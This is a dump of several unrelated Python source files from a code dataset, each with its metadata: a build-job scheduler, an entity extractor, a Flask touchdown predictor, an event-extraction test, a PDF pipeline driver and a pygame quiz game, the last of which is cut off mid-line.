job_key = bfs_queue.popleft()\n for dependency_key in self._dependencies[job_key]:\n job_priority[dependency_key] = \\\n max(job_priority[dependency_key],\n job_size[dependency_key] + job_priority[job_key])\n satisfied_dependees_count[dependency_key] += 1\n if satisfied_dependees_count[dependency_key] == len(self._dependees[dependency_key]):\n bfs_queue.append(dependency_key)\n\n return job_priority\n\n def execute(self, pool, log):\n \"\"\"Runs scheduled work, ensuring all dependencies for each element are done before execution.\n\n :param pool: A WorkerPool to run jobs on\n :param log: logger for logging debug information and progress\n\n submits all the work without any dependencies to the worker pool\n when a unit of work finishes,\n if it is successful\n calls success callback\n checks for dependees whose dependencies are all successful, and submits them\n if it fails\n calls failure callback\n marks dependees as failed and queues them directly into the finished work queue\n when all work is either successful or failed,\n cleans up the work pool\n if there's an exception on the main thread,\n calls failure callback for unfinished work\n aborts work pool\n re-raises\n \"\"\"\n log.debug(self.format_dependee_graph())\n\n status_table = StatusTable(self._job_keys_as_scheduled,\n {key: len(self._jobs[key].dependencies) for key in self._job_keys_as_scheduled})\n finished_queue = queue.Queue()\n\n heap = []\n jobs_in_flight = ThreadSafeCounter()\n\n def put_jobs_into_heap(job_keys):\n for job_key in job_keys:\n # minus because jobs with larger priority should go first\n heappush(heap, (-self._job_priority[job_key], job_key))\n\n def try_to_submit_jobs_from_heap():\n def worker(worker_key, work):\n try:\n work()\n result = (worker_key, SUCCESSFUL, None)\n except Exception as e:\n result = (worker_key, FAILED, e)\n finished_queue.put(result)\n jobs_in_flight.decrement()\n\n while len(heap) > 0 and jobs_in_flight.get() < pool.num_workers:\n priority, job_key = heappop(heap)\n jobs_in_flight.increment()\n status_table.mark_queued(job_key)\n pool.submit_async_work(Work(worker, [(job_key, (self._jobs[job_key]))]))\n\n def submit_jobs(job_keys):\n put_jobs_into_heap(job_keys)\n try_to_submit_jobs_from_heap()\n\n try:\n submit_jobs(self._job_keys_with_no_dependencies)\n\n while not status_table.are_all_done():\n try:\n finished_key, result_status, value = finished_queue.get(timeout=10)\n except queue.Empty:\n log.debug(\"Waiting on \\n {}\\n\".format(\"\\n \".join(\n \"{}: {}\".format(key, state) for key, state in status_table.unfinished_items())))\n try_to_submit_jobs_from_heap()\n continue\n\n finished_job = self._jobs[finished_key]\n direct_dependees = self._dependees[finished_key]\n status_table.mark_as(result_status, finished_key)\n\n # Queue downstream tasks.\n if result_status is SUCCESSFUL:\n try:\n finished_job.run_success_callback()\n except Exception as e:\n log.debug(traceback.format_exc())\n raise ExecutionFailure(\"Error in on_success for {}\".format(finished_key), e)\n\n ready_dependees = []\n for dependee in direct_dependees:\n status_table.mark_one_successful_dependency(dependee)\n if status_table.is_ready_to_submit(dependee):\n ready_dependees.append(dependee)\n\n submit_jobs(ready_dependees)\n else: # Failed or canceled.\n try:\n finished_job.run_failure_callback()\n except Exception as e:\n log.debug(traceback.format_exc())\n raise ExecutionFailure(\"Error in on_failure for {}\".format(finished_key), e)\n\n # Propagate failures downstream.\n for dependee in direct_dependees:\n if status_table.is_unstarted(dependee):\n status_table.mark_queued(dependee)\n finished_queue.put((dependee, CANCELED, None))\n\n # Log success or failure for this job.\n if result_status is FAILED:\n log.error(\"{} failed: {}\".format(finished_key, value))\n else:\n log.debug(\"{} finished with status {}\".format(finished_key, result_status))\n except ExecutionFailure:\n raise\n except Exception as e:\n # Call failure callbacks for jobs that are unfinished.\n for key, state in status_table.unfinished_items():\n self._jobs[key].run_failure_callback()\n log.debug(traceback.format_exc())\n raise ExecutionFailure(\"Error running job\", e)\n\n if status_table.has_failures():\n raise ExecutionFailure(\"Failed jobs: {}\".format(', '.join(status_table.failed_keys())))\n", "sub_path": "src/python/pants/backend/jvm/tasks/jvm_compile/execution_graph.py", "file_name": "execution_graph.py", "file_ext": "py", "file_size_in_byte": 11428, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "threading.Lock", "line_number": 134, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 162, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 163, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 206, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 208, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 214, "usage_type": "call"}, {"api_name": "Queue.Queue", "line_number": 252, "usage_type": "call"}, {"api_name": "heapq.heappush", "line_number": 260, "usage_type": "call"}, {"api_name": "heapq.heappop", "line_number": 273, "usage_type": "call"}, {"api_name": "pants.base.worker_pool.Work", "line_number": 276, "usage_type": "call"}, {"api_name": "Queue.Empty", "line_number": 288, "usage_type": "attribute"}, {"api_name": "traceback.format_exc", "line_number": 303, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 317, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 337, "usage_type": "call"}]} +{"seq_id": "226724734", "text": "#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n'''\nextrait les interviews mais sur les dossiers (permet de voir la progression)\nNécéssite d'avoir le dossier interview et les fichiers d'interview, donné par le script extractInterview.py\n\nusage : python3 extractNE-2.py [language=fr]\nsortie : Out-EN-polyglott.txt\n\nsi pb:\npip3 install pycld2\npip3 install morfessor\npip3 install pyicu\npip3 install pycld2\n\npuis :\npolyglot download embeddings2.en\npolyglot download ner2.en\npolyglot download embeddings2.fr\npolyglot download ner2.fr\n\n'''\n\nimport os\nimport re\nimport sys\nfrom datetime import datetime\nfrom termcolor import colored\nfrom polyglot.text import Text as Ptext\nfrom tqdm import tqdm\n\ntry:\n lang = sys.argv[1]\nexcept IndexError:\n print('en français')\n lang = 'fr'\n\nrep = './Interviews/'\nlisInterview = os.listdir(rep)\npbar = tqdm(total=len(lisInterview))\n\nout = open(\"Out-EN-polyglott.txt\", 'w')\nnamedEntities = []\n\nfor file in lisInterview:\n\n ptext = Ptext(open(rep + file).read(), hint_language_code=lang)\n ne = ptext.entities\n namedEntities = namedEntities + ne\n for e in ne: out.write(str(e) + '\\n')\n pbar.update()\n\nout.close()\n\nprint(colored(namedEntities[:-100],'green'))\nprint(str(len(namedEntities)) + ' entités nommées trouvées')\nprint(\"fichier sortie : Out-EN-polyglott.txt\")\n", "sub_path": "extractNE-polyglott-.py", "file_name": "extractNE-polyglott-.py", "file_ext": "py", "file_size_in_byte": 1316, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.argv", "line_number": 33, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 39, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 40, "usage_type": "call"}, {"api_name": "polyglot.text.Text", "line_number": 47, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "139914465", "text": "# Example adapted from http://flask.pocoo.org/docs/0.12/patterns/fileuploads/\n# @NOTE: The code below is for educational purposes only.\n# Consider using the more secure version at the link above for production apps\nimport matplotlib.pyplot as plt\nfrom sklearn import tree\nfrom sklearn.linear_model import LinearRegression\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport os\nfrom keras.models import load_model\nfrom flask import Flask, request, render_template,json\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = 'uploads'\n\n\ndef train_model():\n arr = []\n df = pd.read_csv(\"stats1.csv\")\n target_names = df[\"TD\"]\n data = df.drop(\"TD\", axis=1)\n feature_names = data.columns\n\n data = df.values\n X = data[:, 0:11]\n y = data[:, 11]\n y = y.astype('int')\n X = X.astype('int')\n\n model = LinearRegression()\n model.fit(X, y)\n score = model.score(X, y)\n # print(f\"R2 Score: {score}\")\n arr.append(X)\n arr.append(y)\n return arr\n\n\n@app.route('/data')\ndef landing_page():\n\n df = pd.read_csv(\"stats2.csv\")\n\n\n # a=[]\n # a.append(df.to_json(orient='records', lines=True))\n # a\n response = app.response_class(\n # response=json.dumps(df.to_json(orient='index')),\n response=df.to_json(orient='index'),\n\n status=200,\n mimetype='application/json'\n )\n return response\n\n\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef webprint():\n arr = train_model()\n\n # load model\n filename = 'finalized_model.sav'\n loaded_model = pickle.load(open(filename, 'rb'))\n result = loaded_model.score(arr[0], arr[1])\n print(result)\n # make prediction\n li = []\n\n atemp = request.form.get('att')\n comp = request.form.get('cmp')\n perc = request.form.get('pct')\n yarsd = request.form.get('yds')\n yardsatt = request.form.get('ypa')\n inter = request.form.get('inter')\n interper = request.form.get('intpct')\n longth = request.form.get('lg')\n sack = request.form.get('sack')\n loss = request.form.get('loss')\n rate = request.form.get('rate')\n tchdper = request.form.get('tprc')\n\n li.append(atemp)\n li.append(comp)\n li.append(perc)\n li.append(yarsd)\n li.append(yardsatt)\n li.append(tchdper)\n li.append(inter)\n li.append(interper)\n li.append(longth)\n li.append(sack)\n li.append(loss)\n li.append(rate)\n mat = np.array(li)\n\n x = np.array(['1.1', '2.2', '3.3'])\n y = x.astype(np.float)\n\n mat_con = mat.astype(np.float)\n\n # print(loaded_model.predict([mat_con]))\n\n\n if request.method =='POST':\n # print(loaded_model.predict([y])) \n print(mat_con)\n model = load_model(\"td_predict.h5\")\n\n\n val = model.predict([[mat_con]])\n data = {\"Predicted Touchdowns\":str(val), \"Model Type\": \"Sequential\",\"Loaded Model\":\"td_predict.h5\", \"Epochs\": \"500\"}\n print(data)\n\n response = app.response_class(\n response=json.dumps(data),\n status=200,\n mimetype='application/json'\n )\n return response\n\n\n \n return render_template('index.html')\n\nif __name__ == \"__main__\":\n app.run(debug=True)", "sub_path": "final-master/final/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 3113, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Flask", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 20, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 31, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 43, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 73, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 73, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 74, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 74, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 75, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 75, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 76, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 76, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 77, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 77, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 78, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 78, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 79, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 79, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 80, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 80, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 81, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 81, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 81, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 82, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 82, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 82, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 83, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 83, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 84, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 84, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 101, "usage_type": "attribute"}, {"api_name": "numpy.float", "line_number": 103, "usage_type": "attribute"}, {"api_name": "flask.request.method", "line_number": 108, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 108, "usage_type": "name"}, {"api_name": "keras.models.load_model", "line_number": 111, "usage_type": "call"}, {"api_name": "flask.json.dumps", "line_number": 119, "usage_type": "call"}, {"api_name": "flask.json", "line_number": 119, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 127, "usage_type": "call"}]} +{"seq_id": "262644152", "text": "import csv\nimport os\nfrom typing import (Any, List)\n\nfrom fedot.core.utils import default_fedot_data_dir\n\n\ndef write_composer_history_to_csv(historical_chains: List[Any], file='history.csv'):\n history_dir = os.path.join(default_fedot_data_dir(), 'composing_history')\n file = f'{history_dir}/{file}'\n if not os.path.isdir(history_dir):\n os.mkdir(history_dir)\n write_header_to_csv(file)\n i = 0\n for gen_num, gen_chains in enumerate(historical_chains):\n for chain in gen_chains:\n add_history_to_csv(file, chain.fitness, len(chain.nodes), chain.depth, i, gen_num)\n i += 1\n\n\ndef write_header_to_csv(f):\n with open(f, 'w', newline='') as file:\n writer = csv.writer(file, quoting=csv.QUOTE_ALL)\n writer.writerow(['num', 'generation', 'fitness, num_of_models, depth'])\n\n\ndef add_history_to_csv(f, fitness: float, models_num: int, depth: int, num: int = None, generation: int = None):\n with open(f, 'a', newline='') as file:\n writer = csv.writer(file, quoting=csv.QUOTE_ALL)\n writer.writerow([num, generation, fitness, models_num, depth])\n", "sub_path": "fedot/core/composer/write_history.py", "file_name": "write_history.py", "file_ext": "py", "file_size_in_byte": 1118, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "typing.List", "line_number": 8, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 8, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "fedot.core.utils.default_fedot_data_dir", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 12, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 23, "usage_type": "call"}, {"api_name": "csv.QUOTE_ALL", "line_number": 23, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 29, "usage_type": "call"}, {"api_name": "csv.QUOTE_ALL", "line_number": 29, "usage_type": "attribute"}]} +{"seq_id": "246372721", "text": "#model test\nimport os\nimport numpy as np\nfrom sklearn.externals import joblib\nfrom bert_serving.client import BertClient\nfrom bratreader.repomodel import RepoModel\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import train_test_split\nfrom model_com import create_base_network, get_events, fit_on_data, test_on_data, get_events_in_mention\n\n\ndef testing(DIR_DATA): \n print('\\n\\nTesting {}>>>\\ndata importing:'.format(DIR_DATA))\n TASK_NAME = DIR_DATA\n NAME_DATA_FILE = TASK_NAME+'_data_import'+'.save'\n DIR_MODEL = './save/'\n file_model_trig = DIR_MODEL + TASK_NAME +'_model_trigger.pkl'\n file_model_arg = DIR_MODEL + TASK_NAME + '_model_arg.pkl'\n\n triggers, vec_trig, label_trig, args, vec_arg, label_arg = [], [], [], [], [], []\n try:\n triggers, vec_trig, label_trig, args, vec_arg, label_arg = joblib.load(NAME_DATA_FILE)\n except:\n ANN_FILEs = []\n DIR_ALL_FILES = os.listdir(DIR_DATA)\n for file_name in DIR_ALL_FILES:\n if file_name.split('.')[-1] == 'txt':\n ANN_FILEs.append(file_name[:-4])\n corpus = RepoModel(DIR_DATA) # load corpus\n bc = BertClient(ip='127.0.0.1', port=8701, port_out=8702, show_server_config=True) # bert model as service\n for ANN_FILE in ANN_FILEs:\n doc = corpus.documents[ANN_FILE] # get document with key\n ttriggers, tvec_trig, tlabel_trig, targs, tvec_arg, tlabel_arg, label_arg_for_each_trig = get_events_in_mention(doc, bc)\n triggers.extend(ttriggers)\n vec_trig.extend(tvec_trig)\n label_trig.extend(tlabel_trig)\n args.extend(targs)\n vec_arg.extend(tvec_arg)\n label_arg.extend(tlabel_arg)\n print('trigs:', len(vec_trig), 'args:', len(vec_arg))\n joblib.dump([triggers, vec_trig, label_trig, args, vec_arg, label_arg], NAME_DATA_FILE)\n\n \n X_train, X_test, Y_train, Y_test = train_test_split(vec_trig, label_trig, random_state=0)\n print('='*65,'\\n>>trigger model testing:')\n model_trig, encoder_trig = joblib.load(file_model_trig)\n acc = test_on_data(model_trig, encoder_trig, vec_trig, label_trig, DIR_DATA, en_verbose = 1)\n print('triggers extraction accuracy: {}'.format(acc))\n \n X_train, X_test, Y_train, Y_test = train_test_split(vec_arg, label_arg, random_state=0)\n print('='*65,'\\n>>argument model testing:')\n model_arg, encoder_arg = joblib.load(file_model_arg)\n acc = test_on_data(model_arg, encoder_arg, vec_arg, label_arg, DIR_DATA, en_verbose = 1)\n print('arguements extraction accuracy: {}'.format(acc))\n\n\nDIR_DATAs = ['data_ACE_Chinese']\nfor DIR_DATA in DIR_DATAs:\n testing(DIR_DATA)\n\n \n\n", "sub_path": "model_test.py", "file_name": "model_test.py", "file_ext": "py", "file_size_in_byte": 2701, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sklearn.externals.joblib.load", "line_number": 22, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 22, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 25, "usage_type": "call"}, {"api_name": "bratreader.repomodel.RepoModel", "line_number": 29, "usage_type": "call"}, {"api_name": "bert_serving.client.BertClient", "line_number": 30, "usage_type": "call"}, {"api_name": "model_com.get_events_in_mention", "line_number": 33, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.dump", "line_number": 41, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 41, "usage_type": "name"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 44, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.load", "line_number": 46, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 46, "usage_type": "name"}, {"api_name": "model_com.test_on_data", "line_number": 47, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 50, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.load", "line_number": 52, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 52, "usage_type": "name"}, {"api_name": "model_com.test_on_data", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "337179337", "text": "import sys\nimport time\nimport glob\nimport os\nimport argparse\nimport Extractor as extractor\nimport ConfigPaths as config\nimport CrossReference as crossref\nimport TextWriter as text_writer\nfrom DatabaseFunctionalityModules.DatabaseConnection import add_data\nfrom DatabaseFunctionalityModules.ID_Fixer import fix_pub_and_author_id\nfrom Authors import build_author_list\n\ninput_dir = os.path.join(os.getcwd(), 'inputs/')\noutput_dir = os.path.join(os.getcwd(), 'outputs/')\npdffigures2_dir = config.pdffigures2_dir\nthread_count = config.thread_count\npdfs_are_main_pubs = True\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-s', '--secondary', help='PDF Files have some secondary publications', action='store_true')\n args = parser.parse_args()\n print(args)\n\n if args.secondary:\n print(\"PDF FIles are not all mains or are secondaries\")\n pdfs_are_main_pubs = False\n\n else:\n print(\"PDF Files are mains\")\n pdfs_are_main_pubs = True\n\n init_start = time.time()\n\n is_ready_to_run = extractor.check_resources()\n\n if is_ready_to_run:\n \"remove spaces from names of PDF's since spaces causes pdffigures2 to skip pdf\"\n os.chdir(input_dir)\n for file in glob.glob(\"*.pdf\"):\n extractor.remove_space(file)\n\n print(\"GROBID extracting text, metadata and references\")\n try:\n extractor.data_extractor(input_dir, output_dir)\n except Exception as e:\n print(e)\n sys.exit(\"GROBID encountered an error\")\n\n print(\"PDFFigures2.0 extracting figures and figure captions\")\n\n try:\n extractor.extract_figures(input_dir, output_dir, pdffigures2_dir, thread_count)\n except Exception as e:\n print(e)\n sys.exit(\"PDFFigures encountered an error\")\n\n print(\"Parsing XML and JSON Files\")\n try:\n devices = extractor.parse_output_files(output_dir)\n except Exception as e:\n print(e)\n sys.exit(\"Parser encountered an error\")\n\n connections = {}\n authors = []\n if config.should_init_crossrefs:\n start = time.time()\n connections = crossref.initialize_connections(devices, pdfs_are_main_pubs)\n finish = time.time()\n print(\"Initialized Connections in %f seconds\" % (finish - start))\n if config.add_to_db:\n authors = build_author_list(devices)\n add_data(devices, connections, authors, pdfs_are_main_pubs)\n fix_pub_and_author_id()\n if config.writeToFile:\n start = time.time()\n text_writer.writeFiles(devices, connections, authors)\n finish = time.time()\n print(\"Wrote Files in %f seconds\" % (finish - start))\n\n extractor.clean_output_folder(output_dir)\n finish = time.time()\n print(\"---------- Total Time Taken: %f ---------------------\" % (finish - init_start))\n", "sub_path": "src/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2962, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 15, "usage_type": "call"}, {"api_name": "ConfigPaths.pdffigures2_dir", "line_number": 16, "usage_type": "attribute"}, {"api_name": "ConfigPaths.thread_count", "line_number": 17, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 23, "usage_type": "call"}, {"api_name": "time.time", "line_number": 36, "usage_type": "call"}, {"api_name": "Extractor.check_resources", "line_number": 38, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 42, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 43, "usage_type": "call"}, {"api_name": "Extractor.remove_space", "line_number": 44, "usage_type": "call"}, {"api_name": "Extractor.data_extractor", "line_number": 48, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 51, "usage_type": "call"}, {"api_name": "Extractor.extract_figures", "line_number": 56, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 59, "usage_type": "call"}, {"api_name": "Extractor.parse_output_files", "line_number": 63, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 66, "usage_type": "call"}, {"api_name": "ConfigPaths.should_init_crossrefs", "line_number": 70, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 71, "usage_type": "call"}, {"api_name": "CrossReference.initialize_connections", "line_number": 72, "usage_type": "call"}, {"api_name": "time.time", "line_number": 73, "usage_type": "call"}, {"api_name": "ConfigPaths.add_to_db", "line_number": 75, "usage_type": "attribute"}, {"api_name": "Authors.build_author_list", "line_number": 76, "usage_type": "call"}, {"api_name": "DatabaseFunctionalityModules.DatabaseConnection.add_data", "line_number": 77, "usage_type": "call"}, {"api_name": "DatabaseFunctionalityModules.ID_Fixer.fix_pub_and_author_id", "line_number": 78, "usage_type": "call"}, {"api_name": "ConfigPaths.writeToFile", "line_number": 79, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 80, "usage_type": "call"}, {"api_name": "TextWriter.writeFiles", "line_number": 81, "usage_type": "call"}, {"api_name": "time.time", "line_number": 82, "usage_type": "call"}, {"api_name": "Extractor.clean_output_folder", "line_number": 85, "usage_type": "call"}, {"api_name": "time.time", "line_number": 86, "usage_type": "call"}]} +{"seq_id": "31583973", "text": "import pygame as pg\r\nimport sys\r\nfrom os import path\r\nfrom settings import *\r\nfrom sprites import *\r\nfrom tilemap import *\r\nimport json\r\nimport random\r\n\r\n\r\nclass Game(Player):\r\n def __init__(self, loop, file=\"maths.json\"):\r\n self.loop = loop\r\n pg.init()\r\n self.screen = pg.display.set_mode((WIDTH, HEIGHT))\r\n self.display = self.screen # for menu screen\r\n pg.display.set_caption(TITLE)\r\n self.clock = pg.time.Clock()\r\n pg.key.set_repeat(500, 100)\r\n self.question = -1\r\n self.game_over = False\r\n self.load_data(file)\r\n self.show_question = True\r\n self.font = pg.font.Font('freesansbold.ttf', 32)\r\n self.score_value = 0\r\n self.timer = 0\r\n self.point_coords = []\r\n self.correct_answer = 0\r\n self.countdown = 15\r\n self.new()\r\n\r\n game_over_image = pg.image.load(path.join('assets', 'gameoverscreen.png'))\r\n\r\n def load_data(self, file=\"maths.json\"):\r\n game_folder = path.dirname(__file__)\r\n self.map = Map(path.join(game_folder, 'map.txt'))\r\n with open(file) as load_questions:#opens and then closes json file after usage.\r\n self.questions = json.load(load_questions)\r\n\r\n def new(self):\r\n # initialize all variables and do all the setup for a new game\r\n self.all_sprites = pg.sprite.Group()\r\n self.walls = pg.sprite.Group()\r\n self.points = pg.sprite.Group()\r\n self.point_list = [Point(self, 0), Point(self, 1), Point(self, 2)]\r\n\r\n for row, tiles in enumerate(self.map.data):\r\n for col, tile in enumerate(tiles):\r\n if tile == '1':\r\n Wall(self, col, row)\r\n if tile == 'P':\r\n self.player = Player(self, col, row)\r\n\r\n if tile == 'D':\r\n self.point_coords.append((col, row))\r\n\r\n print(self.point_coords)\r\n # self.camera = Camera(self.map.width, self.map.height)\r\n #self.playing = True\r\n self.new_question()\r\n\r\n def tick(self):\r\n # game loop - set self.playing = False to end the\r\n self.dt = self.clock.tick(FPS) / 1000\r\n\r\n self.timer += self.dt\r\n self.events()\r\n self.update()\r\n self.draw()\r\n\r\n def quit(self):\r\n pg.quit()\r\n sys.exit()\r\n\r\n def update(self):\r\n # update portion of the game loop\r\n if self.game_over is True:\r\n pass\r\n else:\r\n self.all_sprites.update()\r\n # self.camera.update(self.player) # can put any sprite you want for camera to track\r\n\r\n if self.show_question:\r\n # putting it in show question allows user to know right answer even after the game has finished\r\n if self.countdown <= 0:\r\n # update question screen\r\n pass\r\n else:\r\n #draw answer\r\n\r\n\r\n self.new_question()\r\n\r\n #shows, new question after 0.5 seconds\r\n pass\r\n\r\n def draw_grid(self):\r\n for x in range(0, WIDTH, TILESIZE):\r\n pg.draw.line(self.screen, BLACK, (x, 0), (x, HEIGHT))\r\n for y in range(0, HEIGHT, TILESIZE):\r\n pg.draw.line(self.screen, BLACK, (0, y), (WIDTH, y))\r\n\r\n def draw_question(self):\r\n current_question = self.questions[\"questions\"][self.questions[\"order\"][self.question]][\"question\"]\r\n answers = self.questions[\"questions\"][self.questions[\"order\"][self.question]][\"answer\"]\r\n questions_text = self.font.render(current_question, True, WHITE)\r\n self.screen.blit(questions_text, (WIDTH // 2 - questions_text.get_width()//2, 0))\r\n answers = answers[3 - self.correct_answer:3] + answers[0:3 - self.correct_answer] # randomizes the answer selection, self.correct_answer = correct index\r\n for answer in range(len(answers)):\r\n answers_text = self.font.render(answers[answer], True, WHITE)\r\n self.screen.blit(answers_text, (answer * WIDTH // len(answers) + 100, HEIGHT - TILESIZE * 2))\r\n print (answers)\r\n\r\n\r\n def new_question(self):\r\n self.show_question = True\r\n self.question += 1 #\"order\" in json will go up by one.\r\n self.correct_answer = random.randrange(3)\r\n current_choice = random.sample(self.point_coords, 3)\r\n for x in range(3):\r\n self.point_list[x].move_point(current_choice[x])\r\n\r\n def next_question(self, choice):\r\n if self.show_question == True:\r\n self.show_question = False\r\n if choice == self.correct_answer:\r\n self.score_value += 1\r\n self.countdown += 5\r\n else:\r\n self.score_value -= 1\r\n print(self.score_value)\r\n\r\n\r\n def draw(self):\r\n\r\n if self.countdown <= 0 and self.show_question is True or self.game_over is True:\r\n finalscore = self.font.render(str(self.score_value), True, YELLOW)\r\n\r\n self.screen.blit(self.game_over_image, [0, 0])\r\n self.screen.blit(finalscore, [400, 500]) # MOVE TO THE CORRECT POSITION\r\n self.game_over = True\r\n\r\n\r\n else:\r\n self.screen.fill(BGCOLOR)\r\n self.draw_grid()\r\n for sprite in self.all_sprites:\r\n # self.screen.blit(sprite.image, self.camera.apply(sprite))\r\n self.screen.blit(sprite.image, sprite)\r\n # iterates over each sprite, applying transformation to them.\r\n self.draw_UI()\r\n pg.display.flip()\r\n\r\n def draw_UI(self):\r\n # countdown timer\r\n\r\n self.countdown -= self.dt\r\n displaycountdown = math.trunc(self.countdown)\r\n # scorepointer\r\n text = self.font.render('Score: ' + str(self.score_value), True, GREEN)\r\n textRect = text.get_rect()\r\n countdowntext = self.font.render(str(displaycountdown), True, GREEN)\r\n\r\n pg.draw.rect(self.screen, BLACK, (0, 0, WIDTH, TILESIZE * 3))\r\n pg.draw.rect(self.screen, BLACK, (0, HEIGHT - TILESIZE * 3, WIDTH, TILESIZE * 3))\r\n pg.draw.rect(self.screen, BLUE, (0, HEIGHT - TILESIZE * 3, 200, 200))\r\n pg.draw.rect(self.screen, RED, (400, HEIGHT - TILESIZE * 3, 200, 200))\r\n pg.draw.rect(self.screen, LIGHTGREY, (750, HEIGHT - TILESIZE * 